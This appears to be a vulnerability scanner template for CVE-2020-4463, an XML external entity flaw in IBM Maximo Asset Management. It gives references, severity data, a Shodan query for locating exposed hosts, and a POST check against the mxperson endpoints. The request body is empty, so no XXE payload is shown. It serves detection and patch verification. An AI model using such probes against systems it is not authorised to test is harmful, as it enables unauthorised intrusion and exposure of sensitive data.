id: CVE-2020-4463 info: name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection author: dwisiswant0 severity: high description: | IBM Maximo Asset Management is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. remediation: | Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484 - https://www.ibm.com/support/pages/node/6253953 - https://nvd.nist.gov/vuln/detail/CVE-2020-4463 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 epss-score: 0.6611 epss-percentile: 0.97591 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 tags: cve,cve2020,ibm,xxe,disclosure http: - method: POST path: - "{{BaseURL}}/os/mxperson" - "{{BaseURL}}/meaweb/os/mxperson" body: | headers: Content-Type: "application/xml" matchers-condition: and matchers: - type: word part: body words: - "QueryMXPERSONResponse" - "MXPERSONSet" - type: word part: header words: - "application/xml" # digest: 490a004630440220550da69e738a45c31fe047a9b051050b31f8f0a3ce816b3118d5108b3c3a5b62022039a752606db0cd8399cfd19a9b466d2195145b8e2caf3d56c11c852639892cf6:922c64590222798bb761d5b6d8e72950